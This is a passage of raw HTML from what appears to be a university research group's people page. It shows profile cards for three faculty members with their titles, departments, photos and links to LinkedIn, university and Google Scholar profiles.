v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c439 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c440\" class=\"d-block style-980 style-local-182-c440 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/sunderraman1.jpeg\" class=\"wp-image-692 style-980-image style-local-182-c440-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-980-frameImage style-local-182-c440-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c441\" class=\"h-global-transition-all h-heading style-974 style-local-182-c441 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c441\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Raj Sunderraman</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c442\" class=\"h-text h-text-component style-975 style-local-182-c442 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Associate Chair and Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c443\" class=\"h-text h-text-component style-976 style-local-182-c443 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c444\" class=\"style-981 style-local-182-c444 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/raj-sunderraman-a5591bb2/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/raj-sunderraman/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?hl=en&amp;user=Wlxc9FEAAAAJ\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c445-outer\">\n            <div data-colibri-id=\"182-c445\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c445 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c446\" class=\"d-block style-982 style-local-182-c446 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-SRM-360x360-1.png\" class=\"wp-image-1601 style-982-image style-local-182-c446-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-982-frameImage style-local-182-c446-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c447\" class=\"h-global-transition-all h-heading style-974 style-local-182-c447 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c447\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Susie Ramisetty-Mikler</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c448\" class=\"h-text h-text-component style-975 style-local-182-c448 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Research Associate Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c449\" class=\"h-text h-text-component style-976 style-local-182-c449 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Population Health Sciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c450\" class=\"style-983 style-local-182-c450 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/susie-ramisetty-mikler-7a0b3014/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://publichealth.gsu.edu/profile/susie-ramisetty-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=KzNVJwIAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c455-outer\">\n            <div data-colibri-id=\"182-c455\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c455 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c456\" class=\"d-block style-973 style-local-182-c456 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-bourgeois.jpeg\" class=\"wp-image-696 style-973-image style-local-182-c456-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c456-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c457\" class=\"h-global-transition-all h-heading style-974 style-local-182-c457 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c457\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anu Bourgeois</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c458\" class=\"h-text h-text-component style-975 style-local-182-c458 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c459\" class=\"h-text h-text-component style-976 style-local-182-c459 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c460\" class=\"style-977 style-local-182-c460 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anu-bourgeois-09b7b32b/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/anu-bourgeois/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=qsAUgQ8AAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" 